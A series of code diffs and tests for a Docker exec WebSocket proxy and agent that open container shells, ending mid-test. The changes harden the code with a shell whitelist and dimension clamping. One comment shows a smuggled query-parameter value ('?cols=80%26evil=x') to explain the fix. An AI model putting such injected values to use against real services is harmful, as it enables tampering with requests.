     // Forward bytes that arrived past the HTTP response (typical: shell prompt).
+    // If the send throws, the WS is dead: destroy the Docker socket now rather
+    // than relying on the async-iter loop to notice on its first chunk (which
+    // may never arrive on a quiet shell), and skip the resize.
     if (initialBytes.length > 0) {
-      try { ws.send(initialBytes); } catch { closed = true; }
+      try {
+        ws.send(initialBytes);
+      } catch (err) {
+        console.error(`Failed to send initial bytes for container ${containerId}:`, err instanceof Error ? err.message : String(err));
+        closed = true;
+        socket.destroy();
+        return;
+      }
     }
 
     // Fire-and-forget the initial resize: PTY starts at Docker's default
@@ -314,7 +357,16 @@ export async function handleExecSocket(
       try {
         for await (const chunk of stream as AsyncIterable<Buffer>) {
           if (closed) break;
-          try { ws.send(chunk as Buffer); } catch { closed = true; break; }
+          try {
+            ws.send(chunk as Buffer);
+          } catch (err) {
+            // WS gone: stop iterating and destroy the Docker socket so the
+            // upstream TCP connection doesn't leak waiting for the next chunk.
+            console.error(`Failed to forward exec chunk for container ${containerId}:`, err instanceof Error ? err.message : String(err));
+            closed = true;
+            socket.destroy();
+            break;
+          }
         }
       } catch (err) {
         if (!closed) {

--- a/agent/src/routes/exec.ts
+++ b/agent/src/routes/exec.ts
@@ -164,14 +164,15 @@ export async function handleExecSocket(
       AttachStdout: true,
       AttachStderr: true,
       Tty: true,
+      Env: ['TERM=xterm-256color'],
     }) as unknown as ExecInstance;
 
     const stream = await exec.start({ hijack: true, stdin: true });
 
-    // Set the initial PTY size to match what the client reported.
-    await exec.resize({ h: rows, w: cols });
-
-    // Expose stream and exec instance for the WS message/close handlers.
+    // Wire up listeners before resize so exec output is never buffered without
+    // a consumer. resize() is a separate HTTP round-trip that can be slow or
+    // hang through a socket proxy; blocking on it would leave the stream
+    // producing data with no listener attached.
     ws.data.execStream = stream;
     ws.data.execInstance = exec;
 
@@ -180,6 +181,12 @@ export async function handleExecSocket(
     stream.on('data', (chunk: Buffer) => {
       if (closed) return;
       try { ws.send(chunk); } catch { closed = true; }
+    });
+
+    // Fire-and-forget the initial resize — PTY starts at Docker's default (80x24)
+    // and jumps to the client's reported size once this resolves.
+    void exec.resize({ h: rows, w: cols }).catch((e: Error) => {
+      console.error(`Exec resize failed for ${containerId}:`, e.message);
     });
 
     stream.on('end', () => {

--- a/agent/src/routes/exec.ts
+++ b/agent/src/routes/exec.ts
@@ -178,24 +178,38 @@ export async function handleExecSocket(
 
     let closed = false;
 
-    stream.on('data', (chunk: Buffer) => {
-      if (closed) return;
-      try { ws.send(chunk); } catch { closed = true; }
-    });
-
     // Fire-and-forget the initial resize — PTY starts at Docker's default (80x24)
     // and jumps to the client's reported size once this resolves.
     void exec.resize({ h: rows, w: cols }).catch((e: Error) => {
       console.error(`Exec resize failed for ${containerId}:`, e.message);
     });
 
-    stream.on('end', () => {
-      if (closed) return;
-      closed = true;
-      try { ws.close(1000, 'Shell exited'); } catch { /* already closed */ }
-      stream.destroy();
-    });
+    // Use async iteration rather than the 'data' event listener. Bun's Node.js
+    // compat layer doesn't reliably emit 'data' events on the raw TCP socket
+    // obtained via docker-modem's HTTP upgrade hijack, but it does implement
+    // Symbol.asyncIterator on the same stream object.
+    void (async () => {
+      try {
+        for await (const chunk of stream as AsyncIterable<Buffer>) {
+          if (closed) break;
+          try { ws.send(chunk as Buffer); } catch { closed = true; break; }
+        }
+      } catch (err) {
+        if (!closed) {
+          closed = true;
+          console.error(`Exec stream error for container ${containerId}:`, err instanceof Error ? err.message : String(err));
+          try { ws.close(1011, 'Exec stream error'); } catch { /* already closed */ }
+        }
+        return;
+      }
+      if (!closed) {
+        closed = true;
+        try { ws.close(1000, 'Shell exited'); } catch { /* already closed */ }
+      }
+    })();
 
+    // Keep the old event-listener stubs so ws.data.execStream.destroy() in the
+    // close handler still terminates the loop above via the stream error path.
     stream.on('error', (err: Error) => {
       if (closed) return;
       closed = true;

--- a/agent/src/routes/exec.ts
+++ b/agent/src/routes/exec.ts
@@ -5,6 +5,9 @@ import net from 'node:net';
 /** Candidate shells probed in order when preferred is 'auto'. */
 const PROBE_SHELLS = ['bash', 'sh', 'ash'] as const;
 
+/** Shells the client is allowed to request explicitly. Anything else is rejected. */
+const ALLOWED_EXPLICIT_SHELLS = new Set(['bash', 'sh', 'ash', 'zsh']);
+
 interface ExecInstance {
   id?: string;
   start(opts: { hijack: boolean; stdin: boolean }): Promise<Duplex>;
@@ -98,15 +101,19 @@ interface ResizeMessage {
  * running `<shell> -c 'exit 0'` with Tty:false and checking ExitCode. The
  * first shell that exits 0 is returned. Returns `''` when none succeed.
  *
- * When `preferred` is any other string, it is returned directly without
- * probing — the caller is responsible for choosing a valid shell name.
+ * When `preferred` is any other string, it must exactly match one of the
+ * shells in `ALLOWED_EXPLICIT_SHELLS`; otherwise `''` is returned. The
+ * whitelist prevents the query-string-provided `shell` from being a vehicle
+ * for command injection via `container.exec({ Cmd: [shell] })`.
  *
  * @param container - Dockerode container instance
  * @param preferred - Shell name to use, or 'auto' to probe
  * @returns Resolved shell name, or '' if no supported shell found
  */
 export async function probeShell(container: Dockerode.Container, preferred: string): Promise<string> {
-  if (preferred !== 'auto') return preferred;
+  if (preferred !== 'auto') {
+    return ALLOWED_EXPLICIT_SHELLS.has(preferred) ? preferred : '';
+  }
 
   for (const shell of PROBE_SHELLS) {
     try {
@@ -120,14 +127,15 @@ export async function probeShell(container: Dockerode.Container, preferred: stri
 
       // Detach:true starts the process without attaching any stream and
       // returns immediately. hijack:true (the interactive mode) keeps the TCP
-      // connection open waiting for muxed output — with no outputs attached
+      // connection open waiting for muxed output, and with no outputs attached
       // the stream never emits 'end', so every probe hit the 5s timeout and
       // then received ExitCode -1 (process already exited but socket still open).
       await (exec as unknown as { start(o: { Detach: boolean }): Promise<void> }).start({ Detach: true });
 
       // Poll until Docker sets ExitCode; it returns -1 while the process is
-      // still running. 'exit 0' completes in <50ms; 2s is a generous bound.
-      const deadline = Date.now() + 2_000;
+      // still running. 'exit 0' completes in <50ms but slower hosts or proxies
+      // can add overhead; 5s avoids false "no shell found" failures.
+      const deadline = Date.now() + 5_000;
       let { ExitCode } = await exec.inspect();
       while (ExitCode === -1 && Date.now() < deadline) {
         await new Promise<void>((r) => setTimeout(r, 50));
@@ -158,25 +166,44 @@ export async function handleExecMessage(
   stream: Pick<Duplex, 'write'>,
   exec: Pick<ExecInstance, 'resize'>,
 ): Promise<void> {
-  if (typeof message === 'string') {
-    try {
-      const parsed = JSON.parse(message) as unknown;
-      if (
-        parsed !== null &&
-        typeof parsed === 'object' &&
-        (parsed as ResizeMessage).type === 'resize'
-      ) {
-        const { cols, rows } = parsed as ResizeMessage;
-        await exec.resize({ h: rows, w: cols });
-        return;
-      }
-    } catch {
-      // Not JSON — treat as raw stdin.
-    }
+  if (typeof message !== 'string') {
     stream.write(message);
-  } else {
-    stream.write(message);
+    return;
   }
+
+  let parsed: unknown;
+  try {
+    parsed = JSON.parse(message);
+  } catch {
+    // Not JSON; treat as raw stdin.
+    stream.write(message);
+    return;
+  }
+
+  if (
+    parsed !== null &&
+    typeof parsed === 'object' &&
+    (parsed as Partial<ResizeMessage>).type === 'resize'
+  ) {
+    const { cols, rows } = parsed as Partial<ResizeMessage>;
+    if (Number.isFinite(cols) && Number.isFinite(rows)) {
+      // Swallow resize failures: a transient Docker error must not cause the
+      // resize JSON payload to be typed into the user's shell.
+      try {
+        await exec.resize({
+          h: Math.max(1, Math.min(rows as number, 500)),
+          w: Math.max(1, Math.min(cols as number, 500)),
+        });
+      } catch {
+        // resize is best-effort; the PTY keeps its previous size
+      }
+    }
+    return;
+  }
+
+  // Valid JSON but not a resize message: forward as raw stdin (rare; user
+  // could legitimately type JSON in their shell).
+  stream.write(message);
 }
 
 interface ExecSocketData {
@@ -225,8 +252,10 @@ export async function handleExecSocket(
   // the Bun.serve message handler. This window is short (shell probe + exec start),
   // and the client's xterm skeleton hides input until the connection is established.
   const { shell: preferredShell } = ws.data;
-  const cols = Math.max(1, Math.min(ws.data.cols, 500));
-  const rows = Math.max(1, Math.min(ws.data.rows, 500));
+  // Math.min(NaN, 500) is NaN, which Docker rejects. Guard with isFinite and
+  // fall back to xterm defaults so malformed cols/rows don't break the session.
+  const cols = Number.isFinite(ws.data.cols) ? Math.max(1, Math.min(ws.data.cols, 500)) : 80;
+  const rows = Number.isFinite(ws.data.rows) ? Math.max(1, Math.min(ws.data.rows, 500)) : 24;
 
   const container = docker.getContainer(containerId);
   const shell = await probeShell(container, preferredShell);
@@ -272,8 +301,8 @@ export async function handleExecSocket(
       try { ws.send(initialBytes); } catch { closed = true; }
     }
 
-    // Fire-and-forget the initial resize. PTY starts at Docker's default (80x24)
-    // and jumps to the client's reported size once this resolves.
+    // Fire-and-forget the initial resize: PTY starts at Docker's default
+    // (80x24) and jumps to the client's reported size once this resolves.
     void exec.resize({ h: rows, w: cols }).catch((e: Error) => {
       console.error(`Exec resize failed for ${containerId}:`, e.message);
     });

--- a/docker-compose.local.yml
+++ b/docker-compose.local.yml
@@ -146,8 +146,8 @@ services:
   # Agent sidecar for Docker management (management profile)
   agent:
     build:
-      context: .
-      dockerfile: agent/Dockerfile
+      context: ./agent
+      dockerfile: Dockerfile
     container_name: hlm-agent
     restart: unless-stopped
     environment:

--- a/server/routes/api/docker-exec/[containerId].ts
+++ b/server/routes/api/docker-exec/[containerId].ts
@@ -14,6 +14,9 @@ export default defineWebSocketHandler({
   },
 
   async open(peer: Peer) {
+    // Messages arriving before agentConnections.set() completes are dropped by the
+    // message handler's readyState check. The async window here is the DB lookup +
+    // JWT sign + agent WS handshake; client input before that is discarded.
     const url = new URL(peer.request.url);
     const pathParts = url.pathname.split('/').filter(Boolean);
     const containerId = pathParts.at(-1)!;

--- a/server/routes/api/docker-exec/[containerId].ts
+++ b/server/routes/api/docker-exec/[containerId].ts
@@ -1,0 +1,119 @@
+import { defineWebSocketHandler } from 'h3';
+import type { Peer } from 'crossws';
+
+// Maps peer.id to the upstream agent WebSocket so message/close can reach it.
+// Keyed by peer.id (string) because Nitro's crossws Peer has no typed connection object.
+const agentConnections = new Map<string, WebSocket>();
+
+export default defineWebSocketHandler({
+  upgrade(request) {
+    const url = new URL(request.url);
+    if (!url.searchParams.get('host')) {
+      throw Response.json({ error: 'Missing host parameter' }, { status: 400 });
+    }
+  },
+
+  async open(peer: Peer) {
+    const url = new URL(peer.request.url);
+    const pathParts = url.pathname.split('/').filter(Boolean);
+    const containerId = pathParts.at(-1)!;
+    const host = url.searchParams.get('host')!;
+    const shell = url.searchParams.get('shell') ?? 'auto';
+    const cols = url.searchParams.get('cols') ?? '80';
+    const rows = url.searchParams.get('rows') ?? '24';
+
+    try {
+      // Dynamic imports required: static imports break the client bundle with node:async_hooks errors.
+      const { databaseConnectionManager } = await import('../../../../src/lib/clients/database-client');
+      const { loadDatabaseConfig } = await import('../../../../src/lib/config/database-config');
+      const { HostRepository } = await import('../../../../src/lib/database/repositories/host-repository');
+      const dbClient = await databaseConnectionManager.getClient(loadDatabaseConfig());
+      const hostRepo = new HostRepository(dbClient.getPool());
+      const managedHost = await hostRepo.findByName(host);
+
+      if (!managedHost) {
+        peer.close(1011, 'Unknown host');
+        return;
+      }
+
+      const { AgentKeypairsRepository } = await import('../../../../src/lib/database/repositories/agent-keypairs-repository');
+      const { loadMasterKeyring } = await import('../../../../src/lib/crypto/master-key');
+      const { signAgentJwt } = await import('../../../../src/lib/crypto/agent-jwt');
+      const keyring = await loadMasterKeyring();
+      const keypairs = new AgentKeypairsRepository(dbClient.getPool(), keyring);
+      const privateKey = await keypairs.getPrivateKeyForHost(host);
+
+      if (!privateKey) {
+        peer.close(1011, 'No agent keypair for host');
+        return;
+      }
+
+      const jwt = await signAgentJwt(privateKey, host);
+
+      // Convert http/https to ws/wss for the agent WebSocket URL.
+      const agentBase = managedHost.agentUrl.replace(/^https?/, (m) => m === 'https' ? 'wss' : 'ws');
+      const agentUrl = `${agentBase}/exec/${encodeURIComponent(containerId)}?shell=${encodeURIComponent(shell)}&cols=${cols}&rows=${rows}`;
+
+      // The second argument to WebSocket is a Bun-specific extension for custom headers.
+      // Standard WebSocket only accepts a protocols string array, so we cast to satisfy TS.
+      const agentWs = new WebSocket(agentUrl, {
+        headers: { Authorization: `Bearer ${jwt}` },
+      } as unknown as string[]);
+
+      agentConnections.set(peer.id, agentWs);
+      agentWs.binaryType = 'arraybuffer';
+
+      agentWs.onmessage = (event) => {
+        try {
+          peer.send(event.data instanceof ArrayBuffer ? Buffer.from(event.data) : event.data);
+        } catch {
+          // peer already closed
+        }
+      };
+
+      agentWs.onclose = (event) => {
+        agentConnections.delete(peer.id);
+        try { peer.close(event.code || 1000, event.reason || ''); } catch { /* already closed */ }
+      };
+
+      agentWs.onerror = () => {
+        agentConnections.delete(peer.id);
+        try { peer.close(1011, 'Agent connection error'); } catch { /* already closed */ }
+      };
+    } catch (err) {
+      console.error('[docker-exec-ws] open error:', err instanceof Error ? err.message : String(err));
+      try { peer.close(1011, 'Internal error'); } catch { /* already closed */ }
+    }
+  },
+
+  message(peer: Peer, message) {
+    const agentWs = agentConnections.get(peer.id);
+    if (!agentWs || agentWs.readyState !== WebSocket.OPEN) return;
+    // rawData may be ArrayBuffer, Buffer, or null depending on binaryType and crossws adapter.
+    const raw = (message as { rawData?: ArrayBuffer | Buffer | null }).rawData ?? message.text();
+    if (raw instanceof ArrayBuffer) {
+      agentWs.send(raw);
+    } else if (Buffer.isBuffer(raw)) {
+      // WebSocket.send() expects BufferSource; convert Buffer (which has ArrayBufferLike) to Uint8Array.
+      agentWs.send(new Uint8Array(raw));
+    } else {
+      agentWs.send(raw);
+    }
+  },
+
+  close(peer: Peer) {
+    const agentWs = agentConnections.get(peer.id);
+    if (agentWs) {
+      agentConnections.delete(peer.id);
+      try { agentWs.close(1000); } catch { /* already closed */ }
+    }
+  },
+
+  error(peer: Peer) {
+    const agentWs = agentConnections.get(peer.id);
+    if (agentWs) {
+      agentConnections.delete(peer.id);
+      try { agentWs.close(1011); } catch { /* already closed */ }
+    }
+  },
+});

--- a/server/routes/api/docker-exec/[containerId].ts
+++ b/server/routes/api/docker-exec/[containerId].ts
@@ -1,5 +1,5 @@
 import { defineWebSocketHandler } from 'h3';
-import type { Peer } from 'crossws';
+import type { Peer, WSError } from 'crossws';
 
 // Maps peer.id to the upstream agent WebSocket so message/close can reach it.
 // Keyed by peer.id (string) because Nitro's crossws Peer has no typed connection object.
@@ -93,10 +93,11 @@ export default defineWebSocketHandler({
           // crossws peer.send expects BufferSource for binary; Uint8Array is more
           // portable than Buffer across adapters (some stringify Buffer via .toString()).
           peer.send(event.data instanceof ArrayBuffer ? new Uint8Array(event.data) : event.data);
-        } catch {
+        } catch (err) {
           // Peer is gone but the agent stream is still running with nowhere to
           // deliver to. Close it (1001 going-away) so the upstream exec session
           // stops producing output and the agent can free resources.
+          console.error('[docker-exec-ws] peer.send failed, closing agent ws:', err instanceof Error ? err.message : String(err), { host, containerId });
           try { agentWs.close(1001); } catch { /* already closed */ }
         }
       };
@@ -106,11 +107,16 @@ export default defineWebSocketHandler({
         try { peer.close(event.code || 1000, event.reason || ''); } catch { /* already closed */ }
       };
 
-      agentWs.onerror = (ev: Event & { message?: string }) => {
+      agentWs.onerror = (ev: Event) => {
         // Without this log the operator sees nothing for upstream failures
         // (DNS, connection refused, expired JWT, TLS handshake, agent crash);
         // the browser only sees a generic 1011 close.
-        console.error('[docker-exec-ws] agent ws error:', { host, containerId, message: ev?.message });
+        const detail = (ev as ErrorEvent).error;
+        console.error('[docker-exec-ws] agent ws error:', {
+          host,
+          containerId,
+          error: detail instanceof Error ? detail.message : String(detail ?? 'unknown'),
+        });
         agentConnections.delete(peer.id);
         try { peer.close(1011, 'Agent connection error'); } catch { /* already closed */ }
       };
@@ -147,7 +153,8 @@ export default defineWebSocketHandler({
     }
   },
 
-  error(peer: Peer) {
+  error(peer: Peer, err?: WSError) {
+    console.error('[docker-exec-ws] peer error:', { peerId: peer.id, error: err?.message ?? '(no error)' });
     const agentWs = agentConnections.get(peer.id);
     if (agentWs) {
       agentConnections.delete(peer.id);

--- a/server/routes/api/docker-exec/[containerId].ts
+++ b/server/routes/api/docker-exec/[containerId].ts
@@ -5,6 +5,24 @@ import type { Peer } from 'crossws';
 // Keyed by peer.id (string) because Nitro's crossws Peer has no typed connection object.
 const agentConnections = new Map<string, WebSocket>();
 
+// xterm default geometry; used as fallback when the client supplies missing/invalid cols/rows.
+const DEFAULT_COLS = 80;
+const DEFAULT_ROWS = 24;
+// Matches the agent's clamp at agent/src/routes/exec.ts so the proxy can never
+// forward a value the agent would reject.
+const MIN_DIM = 1;
+const MAX_DIM = 500;
+
+function clampDim(raw: string | null, fallback: number): number {
+  if (raw === null) return fallback;
+  const n = Number(raw);
+  if (!Number.isFinite(n)) return fallback;
+  const i = Math.trunc(n);
+  if (i < MIN_DIM) return MIN_DIM;
+  if (i > MAX_DIM) return MAX_DIM;
+  return i;
+}
+
 export default defineWebSocketHandler({
   upgrade(request) {
     const url = new URL(request.url);
@@ -22,8 +40,12 @@ export default defineWebSocketHandler({
     const containerId = pathParts.at(-1)!;
     const host = url.searchParams.get('host')!;
     const shell = url.searchParams.get('shell') ?? 'auto';
-    const cols = url.searchParams.get('cols') ?? '80';
-    const rows = url.searchParams.get('rows') ?? '24';
+    // Defense-in-depth: clamp to integers in [1, 500] before interpolating into the
+    // agent URL. Without this, a client could inject extra query params via
+    // ?cols=80%26evil=x even though the agent regex-validates containerId and
+    // ignores unknown params today.
+    const cols = clampDim(url.searchParams.get('cols'), DEFAULT_COLS);
+    const rows = clampDim(url.searchParams.get('rows'), DEFAULT_ROWS);
 
     try {
       // Dynamic imports required: static imports break the client bundle with node:async_hooks errors.
@@ -72,7 +94,10 @@ export default defineWebSocketHandler({
           // portable than Buffer across adapters (some stringify Buffer via .toString()).
           peer.send(event.data instanceof ArrayBuffer ? new Uint8Array(event.data) : event.data);
         } catch {
-          // peer already closed
+          // Peer is gone but the agent stream is still running with nowhere to
+          // deliver to. Close it (1001 going-away) so the upstream exec session
+          // stops producing output and the agent can free resources.
+          try { agentWs.close(1001); } catch { /* already closed */ }
         }
       };
 
@@ -81,11 +106,19 @@ export default defineWebSocketHandler({
         try { peer.close(event.code || 1000, event.reason || ''); } catch { /* already closed */ }
       };
 
-      agentWs.onerror = () => {
+      agentWs.onerror = (ev: Event & { message?: string }) => {
+        // Without this log the operator sees nothing for upstream failures
+        // (DNS, connection refused, expired JWT, TLS handshake, agent crash);
+        // the browser only sees a generic 1011 close.
+        console.error('[docker-exec-ws] agent ws error:', { host, containerId, message: ev?.message });
         agentConnections.delete(peer.id);
         try { peer.close(1011, 'Agent connection error'); } catch { /* already closed */ }
       };
     } catch (err) {
+      // If open() threw between agentConnections.set() and a later teardown,
+      // the map entry would leak. Delete here so retries on the same peer.id
+      // don't hit a stale WebSocket reference.
+      agentConnections.delete(peer.id);
       console.error('[docker-exec-ws] open error:', err instanceof Error ? err.message : String(err));
       try { peer.close(1011, 'Internal error'); } catch { /* already closed */ }
     }

--- a/server/routes/api/docker-exec/[containerId].ts
+++ b/server/routes/api/docker-exec/[containerId].ts
@@ -68,7 +68,9 @@ export default defineWebSocketHandler({
 
       agentWs.onmessage = (event) => {
         try {
-          peer.send(event.data instanceof ArrayBuffer ? Buffer.from(event.data) : event.data);
+          // crossws peer.send expects BufferSource for binary; Uint8Array is more
+          // portable than Buffer across adapters (some stringify Buffer via .toString()).
+          peer.send(event.data instanceof ArrayBuffer ? new Uint8Array(event.data) : event.data);
         } catch {
           // peer already closed
         }

--- a/server/routes/api/docker-exec/__tests__/[containerId].test.ts
+++ b/server/routes/api/docker-exec/__tests__/[containerId].test.ts
@@ -1,0 +1,281 @@
+import { describe, it, expect, mock, beforeEach, beforeAll, afterAll } from 'bun:test';
+
+// Mock all the dynamic-imported modules at module-graph boundaries.
+// The route uses await import() so each mock must use the exact path the
+// route imports from (relative paths in the route file, NOT @/ aliases).
+const mockFindByName = mock(async (_: string) => null as null | { name: string; agentUrl: string });
+const mockGetPrivateKeyForHost = mock(async (_: string) => null as null | object);
+const mockSignAgentJwt = mock(async () => 'fake.jwt.token');
+
+mock.module('../../../../../src/lib/clients/database-client', () => ({
+  databaseConnectionManager: {
+    getClient: async () => ({ getPool: () => ({} as object) }),
+  },
+}));
+
+mock.module('../../../../../src/lib/config/database-config', () => ({
+  loadDatabaseConfig: () => ({}),
+}));
+
+mock.module('../../../../../src/lib/database/repositories/host-repository', () => ({
+  HostRepository: class {
+    findByName = mockFindByName;
+  },
+}));
+
+mock.module('../../../../../src/lib/database/repositories/agent-keypairs-repository', () => ({
+  AgentKeypairsRepository: class {
+    getPrivateKeyForHost = mockGetPrivateKeyForHost;
+  },
+}));
+
+mock.module('../../../../../src/lib/crypto/master-key', () => ({
+  loadMasterKeyring: async () => ({}),
+}));
+
+mock.module('../../../../../src/lib/crypto/agent-jwt', () => ({
+  signAgentJwt: mockSignAgentJwt,
+}));
+
+// Capture every constructed mock WebSocket so tests can drive .onmessage etc.
+interface ConstructedWs {
+  url: string;
+  init: unknown;
+  binaryType: string;
+  readyState: number;
+  send: ReturnType<typeof mock>;
+  close: ReturnType<typeof mock>;
+  onmessage: ((e: { data: unknown }) => void) | null;
+  onclose: ((e: { code: number; reason: string }) => void) | null;
+  onerror: (() => void) | null;
+}
+const constructedWebSockets: ConstructedWs[] = [];
+
+const OriginalWebSocket = globalThis.WebSocket;
+class MockWebSocket implements ConstructedWs {
+  static OPEN = 1;
+  static CLOSED = 3;
+  binaryType = 'blob';
+  readyState = MockWebSocket.OPEN;
+  send = mock(() => {});
+  close = mock(() => { this.readyState = MockWebSocket.CLOSED; });
+  onmessage: ((e: { data: unknown }) => void) | null = null;
+  onclose: ((e: { code: number; reason: string }) => void) | null = null;
+  onerror: (() => void) | null = null;
+  constructor(public url: string, public init: unknown) {
+    constructedWebSockets.push(this);
+  }
+}
+
+beforeAll(() => {
+  (globalThis as unknown as { WebSocket: typeof MockWebSocket }).WebSocket = MockWebSocket;
+  // Silence the route's console.error during expected error paths.
+  console.error = mock(() => {});
+});
+
+afterAll(() => {
+  (globalThis as unknown as { WebSocket: typeof OriginalWebSocket }).WebSocket = OriginalWebSocket;
+});
+
+const handlerModule = await import('../[containerId]');
+// h3's defineWebSocketHandler wraps the hooks behind a request handler:
+// when invoked it returns a 426 Response with `crossws` attached. To get the
+// hook callbacks themselves, call the exported handler with any event-shaped
+// argument and read `.crossws` off the resulting Response.
+interface HandlerHooks {
+  upgrade?: (req: { url: string }) => void;
+  open: (peer: FakePeer) => Promise<void>;
+  message: (peer: FakePeer, msg: FakeMessage) => void;
+  close: (peer: FakePeer) => void;
+  error: (peer: FakePeer) => void;
+}
+const exported = handlerModule.default as unknown as (event: unknown) => Response & { crossws: HandlerHooks };
+const handler: HandlerHooks = exported({} as unknown).crossws;
+
+interface FakePeer {
+  id: string;
+  request: { url: string };
+  send: ReturnType<typeof mock>;
+  close: ReturnType<typeof mock>;
+}
+
+interface FakeMessage {
+  text: () => string;
+  rawData?: ArrayBuffer | Buffer | null;
+}
+
+function makePeer(opts: { url: string; id?: string }): FakePeer {
+  return {
+    id: opts.id ?? 'peer-1',
+    request: { url: opts.url },
+    send: mock(() => {}),
+    close: mock(() => {}),
+  };
+}
+
+beforeEach(() => {
+  constructedWebSockets.length = 0;
+  mockFindByName.mockReset();
+  mockGetPrivateKeyForHost.mockReset();
+  mockSignAgentJwt.mockClear();
+  mockFindByName.mockImplementation(async () => null);
+  mockGetPrivateKeyForHost.mockImplementation(async () => null);
+  mockSignAgentJwt.mockImplementation(async () => 'fake.jwt.token');
+});
+
+describe('docker-exec websocket route', () => {
+  describe('upgrade', () => {
+    it('rejects requests without host param with HTTP 400', () => {
+      const req = { url: 'http://localhost:3000/api/docker-exec/abc123' };
+      let thrown: unknown;
+      try {
+        handler.upgrade?.(req);
+      } catch (e) {
+        thrown = e;
+      }
+      expect(thrown).toBeInstanceOf(Response);
+      expect((thrown as Response).status).toBe(400);
+    });
+
+    it('passes when host param is present', () => {
+      const req = { url: 'http://localhost:3000/api/docker-exec/abc123?host=server1' };
+      expect(() => handler.upgrade?.(req)).not.toThrow();
+    });
+  });
+
+  describe('open', () => {
+    it('closes with 1011 "Unknown host" when host is not in the registry', async () => {
+      mockFindByName.mockImplementation(async () => null);
+      const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=missing' });
+
+      await handler.open(peer);
+
+      expect(peer.close).toHaveBeenCalledWith(1011, 'Unknown host');
+      expect(constructedWebSockets).toHaveLength(0);
+    });
+
+    it('closes with 1011 "No agent keypair for host" when no keypair exists', async () => {
+      mockFindByName.mockImplementation(async () => ({ name: 'server1', agentUrl: 'http://agent.local:9000' }));
+      mockGetPrivateKeyForHost.mockImplementation(async () => null);
+      const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=server1' });
+
+      await handler.open(peer);
+
+      expect(peer.close).toHaveBeenCalledWith(1011, 'No agent keypair for host');
+      expect(constructedWebSockets).toHaveLength(0);
+    });
+
+    it('transforms http:// agent URL to ws:// when opening the upstream WebSocket', async () => {
+      mockFindByName.mockImplementation(async () => ({ name: 'server1', agentUrl: 'http://agent.local:9000' }));
+      mockGetPrivateKeyForHost.mockImplementation(async () => ({}));
+      const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=server1&shell=bash&cols=100&rows=30' });
+
+      await handler.open(peer);
+
+      expect(constructedWebSockets).toHaveLength(1);
+      expect(constructedWebSockets[0]!.url).toBe('ws://agent.local:9000/exec/abc123?shell=bash&cols=100&rows=30');
+    });
+
+    it('transforms https:// agent URL to wss:// when opening the upstream WebSocket', async () => {
+      mockFindByName.mockImplementation(async () => ({ name: 'server1', agentUrl: 'https://agent.example.com' }));
+      mockGetPrivateKeyForHost.mockImplementation(async () => ({}));
+      const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc%2Fid?host=server1' });
+
+      await handler.open(peer);
+
+      expect(constructedWebSockets[0]!.url.startsWith('wss://agent.example.com/exec/')).toBe(true);
+    });
+
+    it('attaches the agent JWT as a Bearer Authorization header', async () => {
+      mockFindByName.mockImplementation(async () => ({ name: 'server1', agentUrl: 'http://agent.local:9000' }));
+      mockGetPrivateKeyForHost.mockImplementation(async () => ({}));
+      mockSignAgentJwt.mockImplementation(async () => 'jwt-xyz');
+      const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=server1' });
+
+      await handler.open(peer);
+
+      const init = constructedWebSockets[0]!.init as { headers?: Record<string, string> };
+      expect(init.headers?.Authorization).toBe('Bearer jwt-xyz');
+    });
+  });
+
+  describe('message', () => {
+    async function openSessionThenGetPeer(): Promise<FakePeer> {
+      mockFindByName.mockImplementation(async () => ({ name: 'server1', agentUrl: 'http://agent.local:9000' }));
+      mockGetPrivateKeyForHost.mockImplementation(async () => ({}));
+      const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=server1' });
+      await handler.open(peer);
+      // Upstream is OPEN by default on the mock.
+      return peer;
+    }
+
+    it('drops messages when no upstream entry exists for the peer', () => {
+      const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=server1', id: 'no-upstream' });
+      const msg: FakeMessage = { text: () => 'whatever' };
+      // Should not throw and obviously cannot send anywhere.
+      expect(() => handler.message(peer, msg)).not.toThrow();
+    });
+
+    it('forwards ArrayBuffer payload to the upstream WebSocket as-is', async () => {
+      const peer = await openSessionThenGetPeer();
+      const ab = new Uint8Array([0x68, 0x69]).buffer;
+      const msg: FakeMessage = { rawData: ab, text: () => '' };
+      handler.message(peer, msg);
+      expect(constructedWebSockets[0]!.send).toHaveBeenCalledWith(ab);
+    });
+
+    it('forwards Buffer payload by wrapping it in a Uint8Array', async () => {
+      const peer = await openSessionThenGetPeer();
+      const buf = Buffer.from([1, 2, 3, 4]);
+      const msg: FakeMessage = { rawData: buf, text: () => '' };
+      handler.message(peer, msg);
+
+      const sendArg = constructedWebSockets[0]!.send.mock.calls[0]?.[0];
+      expect(sendArg).toBeInstanceOf(Uint8Array);
+      expect(Array.from(sendArg as Uint8Array)).toEqual([1, 2, 3, 4]);
+    });
+
+    it('falls back to message.text() when rawData is absent', async () => {
+      const peer = await openSessionThenGetPeer();
+      const msg: FakeMessage = { rawData: null, text: () => 'ls -la' };
+      handler.message(peer, msg);
+      expect(constructedWebSockets[0]!.send).toHaveBeenCalledWith('ls -la');
+    });
+  });
+
+  describe('close', () => {
+    it('closes the upstream WebSocket and removes the connection map entry', async () => {
+      mockFindByName.mockImplementation(async () => ({ name: 'server1', agentUrl: 'http://agent.local:9000' }));
+      mockGetPrivateKeyForHost.mockImplementation(async () => ({}));
+      const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=server1', id: 'peer-close' });
+      await handler.open(peer);
+      const upstream = constructedWebSockets[0]!;
+
+      handler.close(peer);
+
+      expect(upstream.close).toHaveBeenCalledWith(1000);
+
+      // Second close: a subsequent message should be a no-op (entry deleted).
+      handler.message(peer, { text: () => 'after-close' });
+      // upstream.send count should not have increased from this message.
+      expect(upstream.send).not.toHaveBeenCalled();
+    });
+  });
+
+  describe('error', () => {
+    it('closes the upstream WebSocket with 1011 and removes the connection map entry', async () => {
+      mockFindByName.mockImplementation(async () => ({ name: 'server1', agentUrl: 'http://agent.local:9000' }));
+      mockGetPrivateKeyForHost.mockImplementation(async () => ({}));
+      const peer = makePeer({ url: 'http://localhost:3000/api/docker-exec/abc123?host=server1', id: 'peer-error' });
+      await handler.open(peer);
+      const upstream = constructedWebSockets[0]!;
+
+      handler.error(peer);
+
+      expect(upstream.close).toHaveBeenCalledWith(1011);
+
